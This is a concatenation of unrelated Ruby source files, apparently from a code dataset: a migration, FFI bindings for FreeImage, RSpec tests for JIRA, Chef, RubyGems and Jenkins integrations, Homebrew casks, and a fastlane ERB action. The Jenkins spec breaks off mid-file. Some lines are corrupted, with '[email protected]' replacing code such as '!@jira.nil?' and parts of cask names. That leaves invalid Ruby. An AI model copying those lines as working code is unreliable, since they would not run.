| 36.761364 | 144 | 0.692427 |
91b7d3073fa334c2005df8f25ec52c5a80c3cc05 | 198 | class EmailAndPrintTemplateToCommon < ActiveRecord::Migration
# Reversible migration step: renames commons.template_id to
# print_template_id and adds a separate email_template_id column.
def change
  rename_column :commons, :template_id, :print_template_id
  add_column :commons, :email_template_id, :integer
end
end
| 28.285714 | 61 | 0.80303 |
18c5c3b8c7f5fd3bf996be5fa8892001761ba1f2 | 2,745 | # encoding: UTF-8
require 'ffi'
require 'rbconfig'
# FFI bindings setup for the FreeImage native library: locates the shared
# library on disk and binds it via FFI::Library.
module FreeImage
  # If this is windows we assume FreeImage was compiled with MSVC since that
  # is the binary distribution provided on the web site. If you have compiled
  # FreeImage yourself on windows using another compiler, set this to false.
  # This matters because FreeImage defines different type sizes for MSVC —
  # see types/ffi.rb.
  def self.msvc?
    FFI::Platform.windows?
  end

  # Directories searched for the FreeImage shared library, memoized.
  def self.search_paths
    @search_paths ||=
      if ENV['FREE_IMAGE_LIBRARY_PATH']
        [ENV['FREE_IMAGE_LIBRARY_PATH']]
      elsif FFI::Platform::IS_WINDOWS
        ENV['PATH'].split(File::PATH_SEPARATOR)
      else
        ['/usr/local/{lib64,lib32,lib}', '/opt/local/{lib64,lib32,lib}', '/usr/{lib64,lib32,lib}']
      end
  end

  # Returns the first on-disk match for +lib+ (with the platform's library
  # suffix) across all search paths, or nil when not found.
  def self.find_lib(lib)
    matches = search_paths.flat_map do |path|
      pattern = File.expand_path(File.join(path, "#{lib}.#{FFI::Platform::LIBSUFFIX}"))
      Dir.glob(pattern)
    end
    matches.compact.first
  end

  # Resolved paths for the known FreeImage library names, memoized.
  def self.free_image_library_paths
    @free_image_library_paths ||=
      %w{libfreeimage libfreeimage.3 libfreeimage-3 FreeImage}
        .map { |lib| find_lib(lib) }
        .compact
  end

  extend ::FFI::Library

  # Bind whichever library files were found; fall back to the bare name so
  # the system loader can resolve it.
  if free_image_library_paths.any?
    ffi_lib(*free_image_library_paths)
  else
    ffi_lib("freeimage")
  end

  ffi_convention :stdcall if FFI::Platform.windows?
end
# Types
require 'free-image/types/ffi'
require 'free-image/types/boolean'
# More types
require 'free-image/types/rgb_triple'
require 'free-image/types/rgb_quad'
require 'free-image/types/rgb16'
require 'free-image/types/rgba16'
require 'free-image/types/rgbf'
require 'free-image/types/rgbaf'
require 'free-image/types/complex'
require 'free-image/types/info_header'
# Enums
require 'free-image/enums/color_types'
require 'free-image/enums/dithers'
require 'free-image/enums/filters'
require 'free-image/enums/formats'
require 'free-image/enums/image_types'
# Sources
require 'free-image/sources/abstract_source'
require 'free-image/sources/io'
require 'free-image/sources/file'
require 'free-image/sources/memory'
# Modules
require 'free-image/modules/conversions'
require 'free-image/modules/helper'
require 'free-image/modules/icc'
require 'free-image/modules/information'
require 'free-image/modules/modify'
require 'free-image/modules/pixels'
require 'free-image/modules/transforms'
# Main classes
require 'free-image/errors'
require 'free-image/palette'
require 'free-image/scanline'
require 'free-image/bitmap' | 27.45 | 101 | 0.698361 |
28621736f28d1776c86ea73de08e3b52977b105c | 2,355 | # Copyright 2001-2018 Rally Software Development Corp. All Rights Reserved.
require 'spec_helpers/jira_spec_helper'
require 'rspec'
include JiraSpecHelper
# Round-trip tests for the custom "Target Release" JIRA field: a Rally
# Release value must survive copying in both directions between Rally and
# JIRA through the connector.
describe "The JIRA Custom field for version Tests" do
  before(:all) do
    #Set current working dir to yeti root, as ca_agile_central2_jira_connector.rb sees it
    # Dir.chdir(File.join(File.expand_path(File.dirname(__FILE__)), "/../../.."))
    @jira      = nil
    @rc        = nil
    @connector = nil
  end

  # Fresh Rally and JIRA connections plus a connector per example.
  before :each do
    @konfab = Konfabulator.new(JiraSpecHelper::JIRA_TARGET_RELEASE_CONFIG_FILE)
    @rc = RallyConnection.new(@konfab.section("RallyConnection"))
    @rc.connect()
    @jira = JiraConnection.new(@konfab.section("JiraConnection"))
    @connection = @jira
    @jira.connect()
    @connector = Connector.new(@konfab, @rc, @jira)
  end

  after(:each) do
    @jira.disconnect() if [email protected]?
    @rc.disconnect()   if [email protected]?
  end

  it "should create an issue in Rally with a valid Release value and transfer to JIRA" do
    # create a Rally defect with a valid Release
    fields = { 'Name'    => "Valvoline oil change",
               'State'   => "Submitted",
               'Release' => 'lime'
             }
    rally_defect  = @rc.create(fields)
    rally_oid     = @rc.get_value(rally_defect, "ObjectID")
    rally_release = @rc.get_value(rally_defect, "Release")
    #puts "The Rally Defect Release value is |#{rally_release}|"
    #lambda { rally_release = @rc.get_value(rally_defect, "Release")}.should raise_error(NoMethodError)

    # copy Rally defect to Jira bug
    @connector.copy_to_other({:artifact => rally_defect})

    # find bug in Jira and verify that the TargetRelease value is "lime"
    issue = @jira.find_by_external_id(rally_oid)
    issue["Target Release"].should == "lime"
  end

  it "should create a bug in JIRA with a Target Release version and copy the defect to Rally with the correct Release version" do
    bug_info = { 'Summary' => "Imaginary Hawaiian Girlfriend",
                 "Target Release" => "apple",
    }
    bug, key = create_jira_issue(bug_info, default_external_id=true)

    # copy Jira bug to Rally defect
    @connector.copy_to_rally({:artifact => bug})

    # Rally defect should show a Release of "apple"
    rally_defect = @rc.find_by_external_id(key)
    rally_defect.Release.should == "apple"
  end
end
| 35.149254 | 129 | 0.675584 |
#
# Author:: Tyler Ball (<[email protected]>)
# Copyright:: Copyright 2010-2016, Chef Software Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "spec_helper"
require "chef/encrypted_data_bag_item/check_encrypted"
# Minimal harness that mixes in the module under test so its
# `encrypted?` predicate can be exercised directly.
class CheckEncryptedTester
  include Chef::EncryptedDataBagItem::CheckEncrypted
end
describe Chef::EncryptedDataBagItem::CheckEncrypted do
  let(:tester) { CheckEncryptedTester.new }
  it "detects the item is not encrypted when the data is empty" do
    expect(tester.encrypted?({})).to eq(false)
  end
  it "detects the item is not encrypted when the data only contains an id" do
    expect(tester.encrypted?({ id: "foo" })).to eq(false)
  end
  context "when the item is encrypted" do
    let(:default_secret) { "abc123SECRET" }
    let(:item_name) { "item_name" }
    # Plain (unencrypted) payload used as the encryption input below.
    let(:raw_data) do
      {
        "id" => item_name,
        "greeting" => "hello",
        "nested" => {
          "a1" => [1, 2, 3],
          "a2" => { "b1" => true },
        },
      } end
    let(:version) { 1 }
    # Encrypts raw_data using the format selected by `version`.
    let(:encoded_data) do
      Chef::Config[:data_bag_encrypt_version] = version
      Chef::EncryptedDataBagItem.encrypt_data_bag_item(raw_data, default_secret)
    end
    it "does not detect encryption when the item version is unknown" do
      # It shouldn't be possible for someone to normally encrypt an item with an unknown version - they would have to
      # do something funky like encrypting it and then manually changing the version
      modified_encoded_data = encoded_data
      modified_encoded_data["greeting"]["version"] = 4
      expect(tester.encrypted?(modified_encoded_data)).to eq(false)
    end
    # Shared assertion: detection must consult the version-specific
    # encryptor's key list while classifying the item as encrypted.
    shared_examples_for "encryption detected" do
      it "detects encrypted data bag" do
        expect( encryptor ).to receive(:encryptor_keys).at_least(:once).and_call_original
        expect(tester.encrypted?(encoded_data)).to eq(true)
      end
    end
    context "when encryption version is 1" do
      include_examples "encryption detected" do
        let(:version) { 1 }
        let(:encryptor) { Chef::EncryptedDataBagItem::Encryptor::Version1Encryptor }
      end
    end
    context "when encryption version is 2" do
      include_examples "encryption detected" do
        let(:version) { 2 }
        let(:encryptor) { Chef::EncryptedDataBagItem::Encryptor::Version2Encryptor }
      end
    end
    context "when encryption version is 3", :aes_256_gcm_only, ruby: "~> 2.0.0" do
      include_examples "encryption detected" do
        let(:version) { 3 }
        let(:encryptor) { Chef::EncryptedDataBagItem::Encryptor::Version3Encryptor }
      end
    end
  end
end
| 33.649485 | 118 | 0.66636 |
# frozen_string_literal: true
# Regression spec: making a wallet payment source the user's default must
# broadcast a `subscription_payment_method_changed` event for subscriptions
# that rely on the default payment source.
RSpec.describe Spree::WalletPaymentSource do
  describe 'setting it as the default' do
    it 'reports a payment method changed event for subscriptions that use the default payment source' do
      # Replace the real event bus with a spy so the fired event can be asserted on.
      stub_const('Spree::Event', class_spy(Spree::Event))
      user = create(:user)
      subscription = create(:subscription, user: user)
      payment_source = create(:credit_card, user: user)
      wallet_payment_source = user.wallet.add(payment_source)
      user.wallet.default_wallet_payment_source = wallet_payment_source
      expect(Spree::Event).to have_received(:fire).with(
        'solidus_subscriptions.subscription_payment_method_changed',
        subscription: subscription,
      )
    end
  end
end
| 35.380952 | 104 | 0.732167 |
# frozen_string_literal: false
require 'rubygems/test_case'
require 'rubygems'
require 'fileutils'
# Unit tests for Gem::PathSupport, which resolves the gem home and gem
# search path from GEM_HOME / GEM_PATH / GEM_SPEC_CACHE.
class TestGemPathSupport < Gem::TestCase
  # Point GEM_HOME/GEM_PATH at the per-test tempdir so assertions are hermetic.
  def setup
    super
    ENV["GEM_HOME"] = @tempdir
    ENV["GEM_PATH"] = [@tempdir, "something"].join(File::PATH_SEPARATOR)
  end
  # With no overrides, home comes from GEM_HOME and path from GEM_PATH.
  def test_initialize
    ps = Gem::PathSupport.new
    assert_equal ENV["GEM_HOME"], ps.home
    expected = util_path
    assert_equal expected, ps.path, "defaults to GEM_PATH"
  end
  # An explicit GEM_HOME override is honored and appended to the path.
  def test_initialize_home
    ps = Gem::PathSupport.new "GEM_HOME" => "#{@tempdir}/foo"
    assert_equal File.join(@tempdir, "foo"), ps.home
    expected = util_path + [File.join(@tempdir, 'foo')]
    assert_equal expected, ps.path
  end
  if defined?(File::ALT_SEPARATOR) and File::ALT_SEPARATOR
    # On platforms with an alternate separator (Windows), GEM_HOME is
    # normalized back to the canonical separator.
    def test_initialize_home_normalize
      alternate = @tempdir.gsub(File::SEPARATOR, File::ALT_SEPARATOR)
      ps = Gem::PathSupport.new "GEM_HOME" => alternate
      assert_equal @tempdir, ps.home, "normalize values"
    end
  end
  # An explicit GEM_PATH override is used verbatim, with GEM_HOME appended.
  def test_initialize_path
    ps = Gem::PathSupport.new "GEM_PATH" => %W[#{@tempdir}/foo #{@tempdir}/bar]
    assert_equal ENV["GEM_HOME"], ps.home
    expected = [
      File.join(@tempdir, 'foo'),
      File.join(@tempdir, 'bar'),
      ENV["GEM_HOME"],
    ]
    assert_equal expected, ps.path
  end
  # Overriding both: the supplied home wins and terminates the path.
  def test_initialize_home_path
    ps = Gem::PathSupport.new("GEM_HOME" => "#{@tempdir}/foo",
                              "GEM_PATH" => %W[#{@tempdir}/foo #{@tempdir}/bar])
    assert_equal File.join(@tempdir, "foo"), ps.home
    expected = [File.join(@tempdir, 'foo'), File.join(@tempdir, 'bar')]
    assert_equal expected, ps.path
  end
  # Helper: the GEM_PATH environment value split into its entries.
  def util_path
    ENV["GEM_PATH"].split(File::PATH_SEPARATOR)
  end
  # spec_cache_dir falls back to the default, then tracks GEM_SPEC_CACHE,
  # and an explicit constructor value overrides the environment.
  def test_initialize_spec
    ENV["GEM_SPEC_CACHE"] = nil
    ps = Gem::PathSupport.new
    assert_equal Gem.default_spec_cache_dir, ps.spec_cache_dir
    ENV["GEM_SPEC_CACHE"] = 'bar'
    ps = Gem::PathSupport.new
    assert_equal ENV["GEM_SPEC_CACHE"], ps.spec_cache_dir
    ENV["GEM_SPEC_CACHE"] = File.join @tempdir, 'spec_cache'
    ps = Gem::PathSupport.new "GEM_SPEC_CACHE" => "foo"
    assert_equal "foo", ps.spec_cache_dir
  end
end
| 25.744186 | 80 | 0.654472 |
cask '[email protected]' do
version '2018.2.9f1,2207421190e9'
sha256 :no_check
url "https://download.unity3d.com/download_unity/2207421190e9/MacEditorTargetInstaller/UnitySetup-Android-Support-for-Editor-2018.2.9f1.pkg"
name 'Android Build Support'
homepage 'https://unity3d.com/unity/'
pkg 'UnitySetup-Android-Support-for-Editor-2018.2.9f1.pkg'
depends_on cask: '[email protected]'
preflight do
if File.exist? "/Applications/Unity"
FileUtils.move "/Applications/Unity", "/Applications/Unity.temp"
end
if File.exist? "/Applications/Unity-2018.2.9f1"
FileUtils.move "/Applications/Unity-2018.2.9f1", '/Applications/Unity'
end
end
postflight do
if File.exist? '/Applications/Unity'
FileUtils.move '/Applications/Unity', "/Applications/Unity-2018.2.9f1"
end
if File.exist? '/Applications/Unity.temp'
FileUtils.move '/Applications/Unity.temp', '/Applications/Unity'
end
end
uninstall quit: 'com.unity3d.UnityEditor5.x',
delete: '/Applications/Unity-2018.2.9f1/PlaybackEngines/AndroidPlayer'
end
| 31.111111 | 142 | 0.716964 |
# Copyright © 2011 MUSC Foundation for Research Development
# All rights reserved.
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
require 'spec_helper'
# Specs for subject Calendar creation and population from arm visit groups.
describe Calendar do
  let_there_be_lane
  let_there_be_j
  build_service_request_with_study
  it "should have created a calendar when the subjects were created" do
    arm1.populate_subjects
    arm1.subjects.first.calendar.should_not eq(nil)
  end
  before :each do
    add_visits
  end
  describe 'populate' do
    it "should populate a subject with appointments and procedures" do
      # Populate only runs meaningfully once the request is submitted.
      sub_service_request.update_attribute(:status, 'submitted')
      arm1.populate_subjects
      calendar = arm1.subjects.first.calendar
      calendar.populate(arm1.visit_groups)
      calendar.appointments.should_not eq([])
    end
  end
end | 46.702128 | 145 | 0.788155 |
#
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
require 'json'
payjp_sdk = JSON.parse(File.read(File.join(__dir__, '../sdkconfig.json')))
Pod::Spec.new do |s|
s.name = 'payjp_flutter'
s.version = '0.3.1'
s.summary = 'A Flutter plugin for PAY.JP Mobile SDK.'
s.description = <<-DESC
A Flutter plugin for PAY.JP Mobile SDK.
DESC
s.homepage = 'https://github.com/payjp/payjp-flutter-plugin'
s.license = { :type => 'MIT' }
s.author = { 'PAY.JP (https://pay.jp)' => '[email protected]' }
s.swift_version = '5.0'
s.source = { :path => '.' }
s.source_files = 'Classes/**/*'
s.public_header_files = 'Classes/**/*.h'
s.static_framework = true
s.dependency 'PAYJPFlutterCore', "~> #{payjp_sdk['ios']}"
s.dependency 'CardIO', '~> 5.4.1'
s.dependency 'GoogleUtilities/AppDelegateSwizzler', '~> 7.2'
s.dependency 'Flutter'
# Flutter.framework does not contain a i386 slice. Only x86_64 simulators are supported.
s.pod_target_xcconfig = { 'DEFINES_MODULE' => 'YES', 'VALID_ARCHS[sdk=iphonesimulator*]' => 'x86_64' }
s.ios.deployment_target = '10.0'
end
| 36.848485 | 104 | 0.615954 |
module Fastlane
module Actions
class ErbAction < Action
def self.run(params)
template = File.read(params[:template])
trim_mode = params[:trim_mode]
result = Fastlane::ErbTemplateHelper.render(template, params[:placeholders], trim_mode)
File.open(params[:destination], 'w') { |file| file.write(result) } if params[:destination]
UI.message("Successfully parsed template: '#{params[:template]}' and rendered output to: #{params[:destination]}") if params[:destination]
result
end
#####################################################
# @!group Documentation
#####################################################
def self.description
"Allows to Generate output files based on ERB templates"
end
def self.details
[
"Renders an ERB template with `:placeholders` given as a hash via parameter.",
"If no `:destination` is set, it returns the rendered template as string."
].join("\n")
end
def self.available_options
[
FastlaneCore::ConfigItem.new(key: :template,
short_option: "-T",
env_name: "FL_ERB_SRC",
description: "ERB Template File",
optional: false,
is_string: true),
FastlaneCore::ConfigItem.new(key: :destination,
short_option: "-D",
env_name: "FL_ERB_DST",
description: "Destination file",
optional: true,
is_string: true),
FastlaneCore::ConfigItem.new(key: :placeholders,
short_option: "-p",
env_name: "FL_ERB_PLACEHOLDERS",
description: "Placeholders given as a hash",
default_value: {},
is_string: false,
type: Hash),
FastlaneCore::ConfigItem.new(key: :trim_mode,
short_option: "-t",
env_name: "FL_ERB_TRIM_MODE",
description: "Trim mode applied to the ERB",
optional: true)
]
end
def self.authors
["hjanuschka"]
end
def self.example_code
[
'# Example `erb` template:
# Variable1 <%= var1 %>
# Variable2 <%= var2 %>
# <% for item in var3 %>
# <%= item %>
# <% end %>
erb(
template: "1.erb",
destination: "/tmp/rendered.out",
placeholders: {
:var1 => 123,
:var2 => "string",
:var3 => ["element1", "element2"]
}
)'
]
end
def self.category
:misc
end
def self.is_supported?(platform)
true
end
end
end
end
| 33.938144 | 146 | 0.423147 |
cask 'font-astloch' do
# version '1.000'
version :latest
sha256 :no_check
url 'https://github.com/google/fonts/trunk/ofl/astloch',
using: :svn,
revision: '50',
trust_cert: true
homepage 'http://www.google.com/fonts/specimen/Astloch'
license :ofl
font 'Astloch-Bold.ttf'
font 'Astloch-Regular.ttf'
end
| 21.5 | 58 | 0.656977 |
# Copyright © 2011-2016 MUSC Foundation for Research Development
# All rights reserved.
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Adds indexes on foreign-key columns that were previously unindexed,
# speeding up the joins and lookups that reference them.
class AddMissingIndexesToForeignKeys < ActiveRecord::Migration
  def change
    add_index :approvals, :identity_id
    add_index :approvals, :sub_service_request_id
    add_index :arms, :service_request_id
    add_index :associated_surveys, :surveyable_id
    add_index :associated_surveys, :survey_id
    add_index :calendars, :subject_id
    add_index :charges, :service_id
    add_index :clinical_providers, :identity_id
    add_index :document_groupings, :service_request_id
    add_index :documents, :sub_service_request_id
    add_index :documents, :document_grouping_id
    add_index :line_items, :sub_service_request_id
    add_index :line_items, :service_id
    add_index :line_items, :ssr_id
    add_index :line_items_visits, :arm_id
    add_index :line_items_visits, :line_item_id
    add_index :messages, :notification_id
    add_index :notes, :identity_id
    add_index :notes, :sub_service_request_id
    add_index :notifications, :sub_service_request_id
    add_index :notifications, :originator_id
    add_index :pricing_setups, :organization_id
    add_index :project_roles, :identity_id
    add_index :protocols, :next_ssr_id
    add_index :service_providers, :identity_id
    add_index :service_relations, :related_service_id
    add_index :sub_service_requests, :owner_id
    add_index :sub_service_requests, :ssr_id
    add_index :subjects, :arm_id
    add_index :subsidies, :sub_service_request_id
    add_index :super_users, :identity_id
    add_index :taggings, :tagger_id
    add_index :toast_messages, :sending_class_id
    add_index :tokens, :identity_id
    add_index :user_notifications, :identity_id
    add_index :user_notifications, :notification_id
    add_index :visits, :line_items_visit_id
    add_index :visits, :visit_group_id
  end
end
| 52.650794 | 145 | 0.78987 |
#TODO: Extract Daybreak specific stuff into a Daybreak extension.
require_dependency 'application_controller'
class PublicAccessExtension < Radiant::Extension
version "0.2"
description "Provides public access (signup/signin) to website."
url ""
define_routes do |map|
map.tell 'tell' ,:controller => 'users', :action => 'tell'
map.user_unlock 'users/unlock/:id/:key',:controller => 'users', :action => 'unlock'
map.user_bounce 'admin/bounce' ,:controller => 'admin/users', :action => 'bounce'
map.user_login 'users/:action/:id' ,:controller => 'users'
map.welcome 'admin/welcome' ,:controller => 'admin/users', :action => 'bounce'
map.welcome 'admin/gc' ,:controller => 'admin/tasks', :action => 'collect_garbage'
map.welcome 'admin/monitor_memory' ,:controller => 'admin/tasks', :action => 'monitor_memory'
map.welcome 'admin/free_megabytes' ,:controller => 'admin/tasks', :action => 'free_megabytes'
end
def activate
Radiant::Config.class_eval do
#need 'org.root_url'; need 'org.name'; need 'org.return_email'; need 'org.contact_email'
end
ApplicationHelper.module_eval do
include MarkupHelpers::Toggles
include MarkupHelpers::AuthenticityToken
include MarkupHelpers::Radiant
end
ApplicationController.class_eval do
include Memorylogic
include Styler
include ShareLayouts::Helper
include PublicAccess::SetDefaultAssets
extend PublicAccess::SetDefaultAssets::ClassMethods
before_filter :set_default_assets
before_filter :inject_assets
end
Page.instance_eval do
def generate_key(len = 12)
chars = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
key = ""
1.upto(len) { |i| key << chars[rand(chars.size-1)] }
return key
end
end
Page.class_eval do #TODO: extract to common area.
def part!(name)
part(name) || self.parts.build(:name => name.to_s)
end
end
User.class_eval do
extend PublicAccess::User::ClassMethods
include PublicAccess::User
validates_presence_of :email, :message => 'required' #Required for person linking
belongs_to :person
end
UserActionObserver.observe User, Page, Layout, Snippet, Person, Group, Message, Series #, Photo #TODO better modularize.
Admin::WelcomeController.class_eval{include PublicAccess::LandingPage}
Admin::UsersController.class_eval{include PublicAccess::UsersController}
Admin::PagesController.class_eval{only_allow_access_to :index, :new, :create, :edit, :update, :destroy, :when => [:admin,:staff,:writer,:designer], :denied_url => {:controller => '/admin/users', :action => 'bounce'}}
Admin::SnippetsController.class_eval{only_allow_access_to :index, :new, :create, :edit, :update, :destroy, :when => [:admin,:designer], :denied_url => {:controller => '/admin/users', :action => 'bounce'}}
end
end
| 45.630769 | 220 | 0.673972 |
# frozen_string_literal: true
module Agris
module Api
module Messages
class Import < MessageBase
def initialize(model)
@model = model
end
def message_number
82_320
end
def message_hash
{
xml: xml_hash
}
end
protected
def input_hash
{
:@endofprocessoption => 1,
:@altnameidonfile => 'N',
:@usecurdate4outofrange => 'N',
:@reportoption => 1,
:@usefile => false
}
end
def xml_hash
xml_base_hash.merge(
details: { detail: @model.records.map(&:to_xml_hash) }
)
end
end
end
end
end
| 18.463415 | 66 | 0.471598 |
$LOAD_PATH << File.expand_path('../../../lib', __FILE__)
| 28.5 | 56 | 0.614035 |
puts 'kerker' + 2.to_s + 'herher'
| 17 | 33 | 0.617647 |
# Cookbook Name:: wazuh-manager
# Attributes:: agent_conf
# Author:: Wazuh <[email protected]
# Centralized (shared) agent configuration pushed from the manager.
# 'enabled': whether agent.conf management is active ('yes'/'no' string).
# 'path': location of the shared default agent.conf on the manager.
default['ossec']['centralized_configuration'] = {
  'enabled' => 'no',
  'path' => '/var/ossec/etc/shared/default'
}
# Example of configuration to include in agent.conf
# <agent_config os="Linux">
# <localfile>
# <location>/var/log/linux.log</location>
# <log_format>syslog</log_format>
# </localfile>
# </agent_config>
# Would require to be be declared like:
# default['ossec']['centralized_configuration']['conf']['agent_config']= [
# { "@os" => "Linux",
# "localfile" => {
# "location" => "/var/log/linux.log",
# "log_format" => "syslog"
# }
# }
# ]
| 25.068966 | 74 | 0.584594 |
require 'spec_helper'
require 'unit/puppet/x/spec_jenkins_providers'
# we need to make sure retries is always loaded or random test ordering can
# cause failures when a side effect hasn't yet caused the lib to be loaded
require 'retries'
require 'puppet/x/jenkins/provider/cli'
describe Puppet::X::Jenkins::Provider::Cli do
AuthError = Puppet::X::Jenkins::Provider::Cli::AuthError
NetError = Puppet::X::Jenkins::Provider::Cli::NetError
UnknownError = Puppet::X::Jenkins::Provider::Cli::UnknownError
CLI_AUTH_ERRORS = [<<-EOS, <<-EOS, <<-EOS].freeze
anonymous is missing the Overall/Read permission
EOS
You must authenticate to access this Jenkins.
Use --username/--password/--password-file parameters or login command.
EOS
anonymous is missing the Overall/RunScripts permission
EOS
CLI_NET_ERRORS = [<<-EOS, <<-EOS].freeze
SEVERE: I/O error in channel CLI connection
EOS
java.net.SocketException: Connection reset
EOS
shared_context 'facts' do
before do
Facter.add(:jenkins_cli_jar) { setcode { 'fact.jar' } }
Facter.add(:jenkins_url) { setcode { 'http://localhost:11' } }
Facter.add(:jenkins_ssh_private_key) { setcode { 'fact.id_rsa' } }
Facter.add(:jenkins_puppet_helper) { setcode { 'fact.groovy' } }
Facter.add(:jenkins_cli_tries) { setcode { 22 } }
Facter.add(:jenkins_cli_try_sleep) { setcode { 33 } }
end
end
before do
Facter.clear
# clear class level state
if described_class.class_variable_defined?(:@@cli_auth_required)
described_class.class_variable_set(:@@cli_auth_required, false)
end
allow(described_class).to receive(:command).with(:java).and_return('java')
end
describe '::suitable?' do
it { expect(described_class.suitable?).to eq true }
end
include_examples 'confines to cli dependencies'
describe '::sname' do
it 'returns a short class name' do
expect(described_class.sname).to eq 'Jenkins::Provider::Cli'
end
end
describe '::instances' do
it 'is not implemented' do
expect { described_class.instances }.to raise_error(Puppet::DevError)
end
end
describe '::prefetch' do
let(:catalog) { Puppet::Resource::Catalog.new }
it 'associates a provider with an instance' do
resource = Puppet::Type.type(:notify).new(name: 'test')
catalog.add_resource resource
provider = described_class.new(name: 'test')
expect(described_class).to receive(:instances).
with(catalog) { [provider] }
described_class.prefetch(resource.name => resource)
expect(resource.provider).to eq provider
end
it 'does not break an existing resource/provider association' do
resource = Puppet::Type.type(:notify).new(name: 'test')
catalog.add_resource resource
provider = described_class.new(name: 'test')
resource.provider = provider
expect(described_class).to receive(:instances).
with(catalog) { [provider] }
described_class.prefetch(resource.name => resource)
expect(resource.provider).to eq provider
end
end # ::prefetch
describe '#create' do
context ':ensure' do
it do
provider = described_class.new
expect(provider.instance_variable_get(:@property_hash)[:ensure]).to eq nil
provider.create
expect(provider.instance_variable_get(:@property_hash)[:ensure]).to eq :present
end
end
end # #create
describe '#exists?' do
context 'when :ensure is unset' do
it do
provider = described_class.new
expect(provider.exists?).to eq false
end
end
context 'when :ensure is :absent' do
it 'returns true' do
provider = described_class.new(ensure: :absent)
expect(provider.exists?).to eq false
end
end
context 'when :ensure is :present' do
it 'returns true' do
provider = described_class.new(ensure: :present)
expect(provider.exists?).to eq true
end
end
end # #exists?'
describe '#destroy' do
context ':ensure' do
it do
provider = described_class.new
expect(provider.instance_variable_get(:@property_hash)[:ensure]).to eq nil
provider.destroy
expect(provider.instance_variable_get(:@property_hash)[:ensure]).to eq :absent
end
end
end # #destroy
describe '#flush' do
it 'clears @property_hash' do
provider = described_class.new
provider.create
provider.flush
expect(provider.instance_variable_get(:@property_hash)).to eq({})
end
end # #flush
describe '#cli' do
let(:provider) { described_class.new }
it 'is an instance method' do
expect(provider).to respond_to(:cli)
end
it 'has the same method signature as ::cli' do
expect(described_class.new).to respond_to(:cli).with(2).arguments
end
it 'wraps ::cli class method' do
expect(described_class).to receive(:cli).with('foo', {})
provider.cli('foo', {})
end
it 'extracts the catalog from the resource' do
resource = Puppet::Type.type(:notify).new(name: 'test')
catalog = Puppet::Resource::Catalog.new
resource.provider = provider
catalog.add_resource resource
expect(described_class).to receive(:cli).with(
'foo', catalog: catalog
)
provider.cli('foo', {})
end
end # #cli
describe '#clihelper' do
let(:provider) { described_class.new }
it 'is an instance method' do
expect(provider).to respond_to(:clihelper)
end
it 'has the same method signature as ::clihelper' do
expect(described_class.new).to respond_to(:clihelper).with(2).arguments
end
it 'wraps ::clihelper class method' do
expect(described_class).to receive(:clihelper).with('foo', {})
provider.clihelper('foo', {})
end
it 'extracts the catalog from the resource' do
resource = Puppet::Type.type(:notify).new(name: 'test')
catalog = Puppet::Resource::Catalog.new
resource.provider = provider
catalog.add_resource resource
expect(described_class).to receive(:clihelper).with(
'foo', catalog: catalog
)
provider.clihelper('foo', {})
end
end # #clihelper
describe '::clihelper' do
shared_examples 'uses default values' do
it 'uses default values' do
expect(described_class).to receive(:cli).with(
['groovy', '/usr/lib/jenkins/puppet_helper.groovy', 'foo'], {}, []
)
described_class.clihelper('foo')
end
end # uses default values
shared_examples 'uses fact values' do
